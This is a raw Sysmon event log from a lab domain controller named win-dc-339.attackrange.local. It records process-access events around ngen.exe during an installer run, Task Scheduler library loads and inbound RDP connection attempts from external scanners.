14:57:19.608{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-BA0B-00000000BB01}5568c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.593{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-B80B-00000000BB01}3896c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.593{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-B80B-00000000BB01}3896c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.593{A7A01FEF-EBCF-607E-B80B-00000000BB01}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.577{A7A01FEF-EBCF-607E-B90B-00000000BB01}9406952C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-B80B-00000000BB01}3896c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.561{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-B90B-00000000BB01}940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.561{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-B80B-00000000BB01}3896c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.561{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-B80B-00000000BB01}3896c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.546{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-B60B-00000000BB01}6172c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.546{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-B60B-00000000BB01}6172c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.546{A7A01FEF-EBCF-607E-B60B-00000000BB01}6172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.530{A7A01FEF-EBCF-607E-B70B-00000000BB01}65925856C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-B60B-00000000BB01}6172c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.452{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-B70B-00000000BB01}6592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.452{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-B60B-00000000BB01}6172c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.452{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-B60B-00000000BB01}6172c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.436{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-B40B-00000000BB01}4808c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.436{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-B40B-00000000BB01}4808c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.436{A7A01FEF-EBCF-607E-B40B-00000000BB01}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.421{A7A01FEF-EBCF-607E-B50B-00000000BB01}65804560C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-B40B-00000000BB01}4808c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.390{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-B50B-00000000BB01}6580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 354300x800000000000000073504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:17.655{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60295-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:17.610{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-20280-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000073502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.358{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-B40B-00000000BB01}4808c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.358{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-B40B-00000000BB01}4808c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.358{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.358{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000073498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.343{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DE6D229AF2E70B3E94F6118184FA206,SHA256=A91622C3AA92B5D271F35D8E3362FA7797521D958634A9DE986A975381CDC600,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.343{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-B20B-00000000BB01}3784c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.343{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-B20B-00000000BB01}3784c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.327{A7A01FEF-EBCF-607E-B20B-00000000BB01}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.311{A7A01FEF-EBCF-607E-B30B-00000000BB01}35444172C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-B20B-00000000BB01}3784c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.311{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-B30B-00000000BB01}3544C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.296{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-B20B-00000000BB01}3784c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 